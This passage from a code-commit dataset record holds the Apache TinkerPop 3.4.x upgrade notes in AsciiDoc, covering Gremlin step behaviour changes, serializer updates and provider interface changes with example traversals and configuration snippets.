conflicted on `application\/json`. By simply making both message serializers support\n`application\/json` and `application\/vnd.gremlin-v2.0+json`, it then became possible to overcome that limitation. In\nshort, prefer use of `GraphSONMessageSerializerV2d0` when possible.\n\nNote that this is a breaking change in the sense that `GraphSONMessageSerializerV2d0` will no longer set the header of\nrequest messages to `application\/json`. As a result, older versions of Gremlin Server not configured with\n`GraphSONMessageSerializerGremlinV2d0` will not find a deserializer to match the request.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1984[TINKERPOP-1984]\n\n==== Reducing Barrier Steps\n\nThe behavior of `min()`, `max()`, `mean()` and `sum()` has been modified to return no result if there's no input.\nPreviously these steps yielded the internal seed value:\n\n[source,groovy]\n----\ngremlin> g.V().values('foo').min()\n==>NaN\ngremlin> g.V().values('foo').max()\n==>NaN\ngremlin> g.V().values('foo').mean()\n==>NaN\ngremlin> g.V().values('foo').sum()\n==>0\n----\n\nThese traversals will no longer emit a result. Note that this also affects more complex scenarios, e.g. if these\nsteps are used in `by()` modulators:\n\n[source,groovy]\n----\ngremlin> g.V().group().\n......1> by(label).\n......2> by(outE().values(\"weight\").sum())\n==>[software:0,person:3.5]\n----\n\nSince software vertices have no outgoing edges and thus no weight values to sum, `software` will no longer show up in\nthe result. In order to get the same result as before, one would have to add a `coalesce()`-step:\n\n[source,groovy]\n----\ngremlin> g.V().group().\n......1> by(label).\n......2> by(outE().values(\"weight\").sum())\n==>[person:3.5]\ngremlin> g.V().group().\n......1> by(label).\n......2> by(coalesce(outE().values(\"weight\"), constant(0)).sum())\n==>[software:0,person:3.5]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1777[TINKERPOP-1777]\n\n==== Order of select() Scopes\n\nThe order of select scopes has been changed to: maps, side-effects, paths. 
Previously the order was: side-effects,\nmaps, paths - which made it almost impossible to select a specific map entry if a side-effect with the same name\nexisted.\n\nThe following snippets illustrate the changed behavior:\n\n[source,groovy]\n----\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\")\n==>[a:marko]\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\").select(\"a\")\n==>[a:marko]\n----\n\nAbove is the old behavior: the second `select(\"a\")` has no effect; it selects the side-effect `a` again, although one\nwould expect to get the map entry `a`. What follows is the new behavior:\n\n[source,groovy]\n----\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\")\n==>[a:marko]\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\").select(\"a\")\n==>marko\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1522[TINKERPOP-1522]\n\n==== GraphSON BulkSet\n\nIn earlier versions of TinkerPop, `BulkSet` was coerced to a `List` for GraphSON which was convenient in that it\ndidn't add a new data type to support, but inconvenient in that it meant that certain process tests were not consistent\nin terms of how they ran and the benefits of the `BulkSet` were \"lost\" in that the \"bulk\" was being resolved server\nside. With the addition of `BulkSet` as a GraphSON type the \"bulk\" is now resolved on the client side by the language\nvariant. How that resolution occurs depends upon the language variant. For Java, there is a `BulkSet` object which\nmaintains that structure sent from the server. For the other variants, the `BulkSet` is deserialized to a `List` form\nwhich results in a much larger memory footprint than what is contained in the `BulkSet`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2111[TINKERPOP-2111]\n\n=== Upgrading for Providers\n\n==== Graph Database Providers\n\n===== io() Step\n\nThe newly introduced `io()`-step brings some changes for providers to consider. Note that `Graph.io()` has been\ndeprecated and users are no longer instructed to utilize that method. It is not yet decided when that method will be\nremoved completely, but given the public nature of it and the high chance of common usage, it should be hanging around\nfor some time.\n\nAs with any step in Gremlin, it is possible to replace it with a more provider-specific implementation that could be\nmore efficient. Developing a `TraversalStrategy` to do this is encouraged, especially for those graph providers who\nmight have special bulk loaders that could be abstracted by this step. Examples of this are already shown with\n`HadoopGraph`, which replaces the simple single-threaded loader with `CloneVertexProgram`. Graph providers are\nencouraged to use the `with()` step to capture any necessary configurations required for their underlying loader to\nwork. Graph providers should not feel restricted to `graphson`, `gryo` and `graphml` formats either. 
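\n\nFor instance, a provider that swaps in its own bulk loader might gather provider-specific settings through the very\nsame mechanism. The following is a sketch only - `provider.batchSize` is a hypothetical configuration key and the CSV\nfile path is illustrative, not an actual TinkerPop option:\n\n[source,java]\n----\n\/\/ a sketch, assuming an existing GraphTraversalSource g - \"provider.batchSize\" is a\n\/\/ hypothetical key that the provider's TraversalStrategy would read when it replaces io()\ng.io(\"data\/graph.csv\").\n    with(\"provider.batchSize\", 10000).\n    read().iterate();\n----\n\n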
If a graph\nsupports CSV or some custom graph-specific format, it shouldn't be difficult to gather the configurations necessary to\nmake that available to users.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1996[TINKERPOP-1996]\n\n===== Caching Graph Features\n\nFor graph implementations that have expensive creation times, it can be time-consuming to run the TinkerPop test suite\nas each test run requires a `Graph` instance even if the test is ultimately ignored because it doesn't pass the feature\nchecks. To possibly help alleviate this problem, the `GraphProvider` interface now includes this method:\n\n[source,java]\n----\npublic default Optional<Graph.Features> getStaticFeatures() {\n return Optional.empty();\n}\n----\n\nThis method can be implemented to return a cacheable set of features for a `Graph` generated from that `GraphProvider`.\nAssuming this method is faster than the cost of creating a new `Graph` instance, the test suite should execute\nsignificantly faster depending on how many tests end up being ignored.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1518[TINKERPOP-1518]\n\n===== Configuring Interface\n\nThere were some changes to the interfaces related to `Step`. A new `Configuring` interface was added that was\nhelpful in the implementation of the `with()`-step modulator. This new interface extends the `Parameterizing` interface\n(which moved to the `org.apache.tinkerpop.gremlin.process.traversal.step` package with the other step interfaces) and\nin turn is extended by the `Mutating` interface. Making this change meant that the `Mutating.addPropertyMutations()`\nmethod could be removed in favor of the new `Configuring.configure()` method.\n\nAll of the changes above basically mean that if the `Mutating` interface was being used in prior versions, the\n`addPropertyMutations()` method simply needs to be changed to `configure()`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1975[TINKERPOP-1975]\n\n===== OptionsStrategy\n\n`OptionsStrategy` is a `TraversalStrategy` that makes it possible for users to set arbitrary configurations on a\n`Traversal`. These configurations can be used by graph providers to allow for traversal-level configurations to be\naccessible to their custom steps. A user would write something like:\n\n[source,java]\n----\ng.withStrategies(OptionsStrategy.build().with(\"specialLimit\", 10000).create()).V();\n----\n\nThe `OptionsStrategy` is really only the carrier for the configurations, and while users can choose the more verbose\nconstruction shown above, it is more elegantly constructed as follows using the `with()`-step:\n\n[source,java]\n----\ng.with(\"specialLimit\", 10000).V();\n----\n\nThe graph provider could then access that value of \"specialLimit\" in their custom step (or elsewhere) as follows:\n\n[source,java]\n----\nOptionsStrategy strategy = this.getTraversal().asAdmin().getStrategies().getStrategy(OptionsStrategy.class).get();\nint specialLimit = (int) strategy.getOptions().get(\"specialLimit\");\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2053[TINKERPOP-2053]\n\n===== Removed hadoop-gremlin Test Artifact\n\nThe `hadoop-gremlin` module no longer generates a test jar that can be used as a test dependency in other modules.\nGenerally speaking, that approach tends to be a bad practice and can cause build problems with Maven that aren't always\nobvious to troubleshoot. 
With the removal of `giraph-gremlin` for 3.4.0, it seemed even less useful to have this\ntest artifact present. All tests are still present. The following provides a basic summary of how this refactoring\noccurred:\n\n* A new `AbstractFileGraphProvider` was created in `gremlin-test` which provided a lot of the features that\n`HadoopGraphProvider` was exposing. Both `HadoopGraphProvider` and `SparkHadoopGraphProvider` extend from that class\nnow.\n* `ToyIoRegistry` and related classes were moved to `gremlin-test`.\n* The various tests that validated capabilities of `Storage` have been moved to `spark-gremlin` and are part of those\ntests now. Obviously, that makes those tests specific to Spark testing now. If that location creates a problem for some\nreason, that decision can be revisited at some point.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1410[TINKERPOP-1410]\n\n===== TraversalEngine Moved\n\nThe `TraversalEngine` interface was deprecated in 3.2.0 along with all related methods that used it and classes that\nimplemented it. It was replaced by the `Computer` interface, which provided a much nicer way to plug different\nimplementations of `Computer` into a traversal. `TraversalEngine` was never wholly removed, however, as it had some deep\ndependencies in the inner workings of the test suite. That infrastructure has largely remained as is until now.\n\nAs of 3.4.0, `TraversalEngine` is no longer in `gremlin-core` and can instead be found in `gremlin-test` as it is\neffectively a \"test-only\" component and serves no other real function. As explained in the javadocs going back to\n3.2.0, providers should implement the `Computer` interface and use that instead. At this point, graph providers should have\nlong ago moved to the `Computer` infrastructure as methods for constructing a `TraversalSource` with a\n`TraversalEngine` were long ago removed.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1143[TINKERPOP-1143]\n\n===== Upsert Graph Feature\n\nSome `Graph` implementations may be able to offer upsert functionality for vertices and edges, which can help improve\nusability and performance. To help make it clear to users that a graph operates in this fashion, the `supportsUpsert()`\nfeature has been added to both `Graph.VertexFeatures` and `Graph.EdgeFeatures`. By default, both of these methods will\nreturn `false`.\n\nShould a provider wish to support this feature, the behavior of `addV()` and\/or `addE()` should change such that when\na vertex or edge with the same identifier is provided, the respective step will insert the new element if that value\nis not present or update an existing element if it is found. The method by which the provider \"identifies\" an element\nis completely up to the capabilities of that provider. In the simplest fashion, a graph could simply check the\nvalue of the supplied `T.id`; however, graphs that support some form of schema will likely have other methods for\ndetermining whether or not an existing element is present.\n\nThe extent to which TinkerPop tests \"upsert\" is fairly narrow. 
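\n\nBy way of illustration, a provider advertising this capability might override the feature method roughly as follows.\nThis is a minimal sketch - `MyVertexFeatures` is a hypothetical provider class, not part of TinkerPop itself:\n\n[source,java]\n----\nimport org.apache.tinkerpop.gremlin.structure.Graph;\n\n\/\/ a sketch - MyVertexFeatures is a hypothetical provider implementation; all other\n\/\/ feature methods keep their interface defaults. Returning true signals that addV()\n\/\/ may update an existing vertex when an element with the same identifier is supplied.\npublic class MyVertexFeatures implements Graph.Features.VertexFeatures {\n    @Override\n    public boolean supportsUpsert() {\n        return true;\n    }\n}\n----\n\n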
Graph providers that choose to support this feature\nshould consider their own test suites carefully to ensure appropriate coverage.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1685[TINKERPOP-1685]\n\n===== TypeTranslator Changes\n\nThe `TypeTranslator` experienced a change in its API and `GroovyTranslator` a change in expectations.\n\n`TypeTranslator` now implements `BiFunction` and takes the graph traversal source name as an argument along with the\nobject to translate. This interface is implemented by default for Groovy with `GroovyTranslator.DefaultTypeTranslator`\nwhich encapsulates all the functionality of what `GroovyTranslator` formerly did by default. To provide customize\ntranslation, simply extend the `DefaultTypeTranslator` and override the methods.\n\n`GroovyTranslator` now expects that the `TypeTranslator` provide to it as part of its `of()` static method overload\nis \"complete\" - i.e. that it provides all the functionality to translate the types passed to it. Thus, a \"complete\"\n`TypeTranslator` is one that does everything that `DefaultTypeTranslator` does as a minimum requirement. Therefore,\nthe extension model described above is the easiest way to get going with a custom `TypeTranslator` approach.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2072[TINKERPOP-2072]\n\n==== Graph Driver Providers\n\n===== Deprecation Removal in RemoteConnection\n\nThe two deprecated synchronous `submit()` methods on the `RemoteConnection` interface have been removed, which means\nthat `RemoteConnection` implementations will need to implement `submitAsync(Bytecode)` if they have not already done\nso.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2103[TINKERPOP-2103]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8acc003553b97f388f437594375187860428efa2","subject":"Added upgrade docs for docker Gremlin Server test config","message":"Added upgrade docs for docker Gremlin Server test config\n","repos":"krlohnes\/tinkerpop,apache\/tinkerpop,apache\/incubator-tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,pluradj\/incubator-tinkerpop,apache\/tinkerpop,apache\/incubator-tinkerpop,robertdale\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,apache\/incubator-tinkerpop,apache\/tinkerpop,pluradj\/incubator-tinkerpop,krlohnes\/tinkerpop,krlohnes\/tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,pluradj\/incubator-tinkerpop","old_file":"docs\/src\/upgrade\/release-3.4.x.asciidoc","new_file":"docs\/src\/upgrade\/release-3.4.x.asciidoc","new_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. 
You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n\n= TinkerPop 3.4.0\n\nimage::https:\/\/raw.githubusercontent.com\/apache\/tinkerpop\/master\/docs\/static\/images\/avant-gremlin.png[width=225]\n\n*Avant-Gremlin Construction #3 for Theremin and Flowers*\n\n== TinkerPop 3.4.3\n\n*Release Date: NOT OFFICIALLY RELEASED YET*\n\nPlease see the link:https:\/\/github.com\/apache\/tinkerpop\/blob\/3.4.3\/CHANGELOG.asciidoc#release-3-4-3[changelog] for a complete list of all the modifications that are part of this release.\n\n=== Upgrading for Providers\n\n==== Graph Driver Providers\n\n===== Gremlin Server Test Configuration\n\nGremlin Server has a test configuration built into its Maven build process which all integration tests and Gremlin\nLanguage Variants use to validate their operations. While this approach has worked really well for test automation\nwithin Maven, there are often times where it would be helpful to simply have Gremlin Server running with that\nconfiguration. This need is especially true when developing Gremlin Language Variants which is something that is done\noutside of the JVM.\n\nThis release introduces a Docker script that will start Gremlin Server with this test configuration. It can be started\nwith:\n\n[source,text]\ndocker\/gremlin-server.sh\n\nOnce started, it is then possible to run GLV tests directly from a debugger against this instance which should\nhopefully reduce development friction.\n\n== TinkerPop 3.4.2\n\n*Release Date: May 28, 2019*\n\nPlease see the link:https:\/\/github.com\/apache\/tinkerpop\/blob\/3.4.2\/CHANGELOG.asciidoc#release-3-4-2[changelog] for a complete list of all the modifications that are part of this release.\n\n=== Upgrading for Users\n\n==== Per Request Options\n\nIn 3.4.0, the notion of `RequestOptions` were added so that users could have an easier way to configure settings on\nindividual requests made through the Java driver. While that change provided a way to set those configurations for\nscript based requests, it didn't include options to make those settings in a `Traversal` submitted via `Bytecode`. In\nthis release those settings become available via `with()` step on the `TraversalSource` as follows:\n\n[source,java]\n----\nGraphTraversalSource g = traversal().withRemote(conf);\nList<Vertex> vertices = g.with(RemoteConnection.PER_REQUEST_TIMEOUT, 500).V().out(\"knows\").toList()\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2211[TINKERPOP-2211]\n\n==== Gremlin Console Timeout\n\nThe Gremlin Console timeout that is set by `:remote config timeout x` was client-side only in prior versions, which\nmeant that if the console timeout was less than the server timeout the client would timeout but the server might still\nbe processing the request. Similarly, a longer timeout on the console would not change the server and the timeout\nwould occur sooner than expected. 
These discrepancies often led to confusion.\n\nAs of 3.4.0, the Java Driver API allowed for timeout settings to be more easily passed per request, so the console\nwas modified for this current version to pass the console timeout for each remote submission, thus yielding more\nconsistent and intuitive behavior.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2203[TINKERPOP-2203]\n\n=== Upgrading for Providers\n\n==== Graph System Providers\n\n===== Warnings\n\nIt is now possible to pass warnings over the Gremlin Server protocol using a `warnings` status attribute. The warnings\nare expected to be a string value or a `List` of string values which can be consumed by the user or tools that check\nfor that status attribute. Note that Gremlin Console is one such tool that will respond to this status attribute - it\nwill print the messages to the console as they are detected when doing remote script submissions.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2216[TINKERPOP-2216]\n\n==== Graph Driver Providers\n\n===== GraphBinary API Change\n\nIn GraphBinary serialization, the Java `write()` and `writeValue()` methods of the `TypeSerializer<T>` interface now\ntake a Netty `ByteBuf` instance instead of a `ByteBufAllocator`, so that the same buffer instance gets reused during\nthe write of a message. Additionally, we took the opportunity to remove the unused parameter from\n`ResponseMessageSerializer`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2161[TINKERPOP-2161]\n\n== TinkerPop 3.4.1\n\n*Release Date: March 18, 2019*\n\nPlease see the link:https:\/\/github.com\/apache\/tinkerpop\/blob\/3.4.1\/CHANGELOG.asciidoc#release-3-4-1[changelog] for a complete list of all the modifications that are part of this release.\n\n=== Upgrading for Users\n\n==== Mix SPARQL and Gremlin\n\nIn the initial release of `sparql-gremlin` it was only possible to execute a SPARQL query and have it translate to\nGremlin. Therefore, it was only possible to write a query like this:\n\n[source,text]\n----\ngremlin> g.sparql(\"SELECT ?name ?age WHERE { ?person v:name ?name . ?person v:age ?age }\")\n==>[name:marko,age:29]\n==>[name:vadas,age:27]\n==>[name:josh,age:32]\n==>[name:peter,age:35]\ngremlin> g.sparql(\"SELECT * WHERE { }\")\n==>v[1]\n==>v[2]\n==>v[3]\n==>v[4]\n==>v[5]\n==>v[6]\n----\n\nIn this release, however, it is now possible to further process that result with Gremlin steps:\n\n[source,text]\n----\ngremlin> g.sparql(\"SELECT ?name ?age WHERE { ?person v:name ?name . ?person v:age ?age }\").select(\"name\")\n==>marko\n==>vadas\n==>josh\n==>peter\ngremlin> g.sparql(\"SELECT * WHERE { }\").out(\"knows\").values(\"name\")\n==>vadas\n==>josh\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2171[TINKERPOP-2171],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.1\/reference\/#sparql-with-gremlin[Reference Documentation]\n\n=== Upgrading for Providers\n\n==== Graph Database Providers\n\n===== GraphBinary Serializer Changes\n\nIn GraphBinary serialization, the Java `write()` and `writeValue()` methods of the `TypeSerializer<T>` interface now\ntake a Netty `ByteBuf` instance instead of a `ByteBufAllocator`, so that the same buffer instance gets reused during\nthe write of a message. 
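\n\nIn rough terms, the shape of the change for a custom serializer is sketched below. This is reconstructed from the\ndescription above rather than quoted from the TinkerPop source, so treat the exact signatures as approximate:\n\n[source,java]\n----\n\/\/ a rough sketch of the TypeSerializer<T> change (imports elided - ByteBuf is Netty's\n\/\/ buffer type, the remaining types come from the gremlin-driver module)\npublic interface TypeSerializer<T> {\n    \/\/ before: ByteBuf write(T value, ByteBufAllocator allocator, GraphBinaryWriter context)\n    \/\/ after: the caller supplies the ByteBuf so a single buffer can be reused\n    \/\/ across the entire message being composed\n    void write(T value, ByteBuf buffer, GraphBinaryWriter context) throws SerializationException;\n}\n----\n\n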
Additionally, we took the opportunity to remove the unused parameter from `ResponseMessageSerializer`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2161[TINKERPOP-2161]\n\n== TinkerPop 3.4.0\n\n*Release Date: January 2, 2019*\n\nPlease see the link:https:\/\/github.com\/apache\/tinkerpop\/blob\/3.4.0\/CHANGELOG.asciidoc#release-3-4-0[changelog] for a complete list of all the modifications that are part of this release.\n\n=== Upgrading for Users\n\n==== sparql-gremlin\n\nThe `sparql-gremlin` module is a link:https:\/\/en.wikipedia.org\/wiki\/SPARQL[SPARQL] to Gremlin compiler, which allows\nSPARQL to be executed over any TinkerPop-enabled graph system.\n\n[source,groovy]\n----\ngraph = TinkerFactory.createModern()\ng = graph.traversal(SparqlTraversalSource)\ng.sparql(\"\"\"SELECT ?name ?age\n WHERE { ?person v:name ?name . ?person v:age ?age }\n ORDER BY ASC(?age)\"\"\")\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1878[TINKERPOP-1878],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#sparql-gremlin[Reference Documentation]\n\n==== Gremlin.NET Driver Improvements\n\nThe Gremlin.NET driver now uses request pipelining. This allows connections to be reused for different requests in\nparallel which should lead to better utilization of connections. The `ConnectionPool` now also has a fixed size\nwhereas it could previously create an unlimited number of connections. Each `Connection` can handle up to\n`MaxInProcessPerConnection` requests in parallel. If this limit is reached for all connections, then a\n`NoConnectionAvailableException` is thrown which makes this a breaking change.\n\nThese settings can be set as properties on the `ConnectionPoolSettings` instance that can be passed to the `GremlinClient`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1774[TINKERPOP-1774],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1775[TINKERPOP-1775],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#_connection_pool[Reference Documentation]\n\n==== Indexing of Collections\n\nTinkerPop 3.4.0 adds a new `index()`-step, which allows users to transform simple collections into index collections or maps.\n\n```\ngremlin> g.V().hasLabel(\"software\").values(\"name\").fold().\n......1> order(local).\n......2> index().unfold()\n==>[lop,0]\n==>[ripple,1]\ngremlin> g.V().hasLabel(\"person\").values(\"name\").fold().\n......1> order(local).by(decr).\n......2> index().\n......3> with(WithOptions.indexer, WithOptions.map)\n==>[0:vadas,1:peter,2:marko,3:josh]\n```\n\n==== Modulation of valueMap()\n\nThe `valueMap()` step now supports `by` and `with` modulation, which also led to the deprecation of `valueMap(true)` overloads.\n\n===== by() Modulation\n\nWith the help of the `by()` modulator `valueMap()` result values can now be adjusted, which is particularly useful to turn multi-\/list-values into single values.\n\n```\ngremlin> g.V().hasLabel(\"person\").valueMap()\n==>[name:[marko],age:[29]]\n==>[name:[vadas],age:[27]]\n==>[name:[josh],age:[32]]\n==>[name:[peter],age:[35]]\ngremlin> g.V().hasLabel(\"person\").valueMap().by(unfold())\n==>[name:marko,age:29]\n==>[name:vadas,age:27]\n==>[name:josh,age:32]\n==>[name:peter,age:35]\n```\n===== with() Modulation\n\nThe `with()` modulator can be used to include certain tokens (`id`, `label`, `key` and\/or `value`).\n\nThe old way (still valid, but deprecated):\n\n```\ngremlin> 
g.V().hasLabel(\"software\").valueMap(true)\n==>[id:10,label:software,name:[gremlin]]\n==>[id:11,label:software,name:[tinkergraph]]\ngremlin> g.V().has(\"person\",\"name\",\"marko\").properties(\"location\").valueMap(true)\n==>[id:6,key:location,value:san diego,startTime:1997,endTime:2001]\n==>[id:7,key:location,value:santa cruz,startTime:2001,endTime:2004]\n==>[id:8,key:location,value:brussels,startTime:2004,endTime:2005]\n==>[id:9,key:location,value:santa fe,startTime:2005]\n```\n\nThe new way:\n\n```\ngremlin> g.V().hasLabel(\"software\").valueMap().with(WithOptions.tokens)\n==>[id:10,label:software,name:[gremlin]]\n==>[id:11,label:software,name:[tinkergraph]]\ngremlin> g.V().has(\"person\",\"name\",\"marko\").properties(\"location\").valueMap().with(WithOptions.tokens)\n==>[id:6,key:location,value:san diego,startTime:1997,endTime:2001]\n==>[id:7,key:location,value:santa cruz,startTime:2001,endTime:2004]\n==>[id:8,key:location,value:brussels,startTime:2004,endTime:2005]\n==>[id:9,key:location,value:santa fe,startTime:2005]\n```\n\nFurthermore, now there's a finer control over which of the tokens should be included:\n\n```\ngremlin> g.V().hasLabel(\"software\").valueMap().with(WithOptions.tokens, WithOptions.labels)\n==>[label:software,name:[gremlin]]\n==>[label:software,name:[tinkergraph]]\ngremlin> g.V().has(\"person\",\"name\",\"marko\").properties(\"location\").valueMap().with(WithOptions.tokens, WithOptions.values)\n==>[value:san diego,startTime:1997,endTime:2001]\n==>[value:santa cruz,startTime:2001,endTime:2004]\n==>[value:brussels,startTime:2004,endTime:2005]\n==>[value:santa fe,startTime:2005]\n```\n\nAs shown above, the support of the `with()` modulator for `valueMap()` makes the `valueMap(boolean)` overload\nsuperfluous, hence this overload is now deprecated. This is a breaking API change, since `valueMap()` will now always\nyield instances of type `Map<Object, Object>`. Prior this change only the `valueMap(boolean)` overload yielded\n`Map<Object, Object>` objects, `valueMap()` without the boolean parameter used to yield instances of type\n`Map<String, Object>`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2059[TINKERPOP-2059]\n\n==== Predicate Number Comparison\n\nIn previous versions `within()` and `without()` performed strict number comparisons; that means these predicates did\nnot only compare number values, but also the type. This was inconsistent with how other predicates (like `eq`, `gt`,\netc.) work. All predicates will now ignore the number type and instead compare numbers only based on their value.\n\nOld behavior:\n\n```\ngremlin> g.V().has(\"age\", eq(32L))\n==>v[4]\ngremlin> g.V().has(\"age\", within(32L, 35L))\ngremlin>\n```\n\nNew behavior:\n\n```\ngremlin> g.V().has(\"age\", eq(32L))\n==>v[4]\ngremlin> g.V().has(\"age\", within(32L, 35L))\n==>v[4]\n==>v[6]\n```\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2058[TINKERPOP-2058]\n\n==== ReferenceElementStrategy\n\nGremlin Server has had some inconsistent behavior in the serialization of the results it returns. Remote traversals\nbased on Gremlin bytecode always detach returned graph elements to \"reference\" (i.e. removes properties and only\ninclude the `id` and `label`), but scripts would detach graph elements and include the properties. 
For 3.4.0,\nTinkerPop introduces the `ReferenceElementStrategy` which can be configured on a `GraphTraversalSource` to always\ndetach to \"reference\".\n\n[source,text]\n----\ngremlin> graph = TinkerFactory.createModern()\n==>tinkergraph[vertices:6 edges:6]\ngremlin> g = graph.traversal().withStrategies(ReferenceElementStrategy.instance())\n==>graphtraversalsource[tinkergraph[vertices:6 edges:6], standard]\ngremlin> v = g.V().has('person','name','marko').next()\n==>v[1]\ngremlin> v.class\n==>class org.apache.tinkerpop.gremlin.structure.util.reference.ReferenceVertex\ngremlin> v.properties()\ngremlin>\n----\n\nThe packaged initialization scripts that come with Gremlin Server now pre-configure the sample graphs with this\nstrategy to ensure that both scripts and bytecode based requests over any protocol (HTTP, websocket, etc) and\nserialization format all return a \"reference\". To revert to the old form, simply remove the strategy in the\ninitialization script.\n\nIt is recommended that users choose to configure their `GraphTraversalSource` instances with `ReferenceElementStrategy`\nas working with \"references\" only is the recommended method for developing applications with TinkerPop. In the future,\nit is possible that `ReferenceElementStrategy` will be configured by default for all graphs on or off Gremlin Server,\nso it would be best to start utilizing it now and grooming existing Gremlin and related application code to account\nfor it.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2075[TINKERPOP-2075]\n\n==== Text Predicates\n\nGremlin now supports simple text predicates on top of the existing `P` predicates. Both, the new `TextP` text\npredicates and the old `P` predicates, can be chained using `and()` and `or()`.\n\n[source,groovy]\n----\ngremlin> g.V().has(\"person\",\"name\", containing(\"o\")).valueMap()\n==>[name:[marko],age:[29]]\n==>[name:[josh],age:[32]]\ngremlin> g.V().has(\"person\",\"name\", containing(\"o\").and(gte(\"j\").and(endingWith(\"ko\")))).valueMap()\n==>[name:[marko],age:[29]]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2041[TINKERPOP-2041]\n\n==== Changed Infix Behavior\n\nThe infix notation of `and()` and `or()` now supports an arbitrary number of traversals and `ConnectiveStrategy`\nproduces a traversal with proper AND and OR semantics.\n\n```\nInput: a.or.b.and.c.or.d.and.e.or.f.and.g.and.h.or.i\n\n*BEFORE*\nOutput: or(a, or(and(b, c), or(and(d, e), or(and(and(f, g), h), i))))\n\n*NOW*\nOutput: or(a, and(b, c), and(d, e), and(f, g, h), i)\n```\n\nFurthermore, previous versions failed to apply 3 or more `and()` steps using the infix notation, this is now fixed.\n\n[source,groovy]\n----\ngremlin> g.V().has(\"name\",\"marko\").and().has(\"age\", lt(30)).or().has(\"name\",\"josh\").and().has(\"age\", gt(30)).and().out(\"created\")\n==>v[1]\n==>v[4]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2029[TINKERPOP-2029]\n\n==== GraphBinary\n\nGraphBinary is a new language agnostic, network serialization format designed to replace Gryo and GraphSON. At this\ntime it is only available on the JVM, but support will be added for other languages in upcoming releases. The\nserializer has been configured in Gremlin Server's packaged configuration files. 
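\n\nFor reference, the relevant entry in a Gremlin Server YAML configuration looks roughly like the following fragment\n(a sketch - only the `serializers` list is shown, surrounding settings are omitted, and the class name should be\nverified against the version in use):\n\n[source,yaml]\n----\nserializers:\n  - { className: org.apache.tinkerpop.gremlin.driver.ser.GraphBinaryMessageSerializerV1 }\n----\n\n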
The serializer can be configured\nusing the Java driver as follows:\n\n[source,java]\n----\nCluster cluster = Cluster.build(\"localhost\").port(8182).\n serializer(Serializers.GRAPHBINARY_V1D0).create();\nClient client = cluster.connect();\nList<Result> r = client.submit(\"g.V().has('person','name','marko')\").all().join();\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1942[TINKERPOP-1942],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/dev\/io\/#graphbinary[IO Documentation]\n\n==== Status Attributes\n\nThe Gremlin Server protocol allows for status attributes to be returned in responses. These attributes were typically\nfor internal use, but were designed with extensibility in mind so that providers could return their own\nattributes to calling clients. Unfortunately, unless the client was being used with protocol-level requests (which\nwasn't convenient) those attributes were essentially hidden from view. As of this version, however, status attributes\nare fully retrievable for both successful requests and exceptions.\n\nSee: 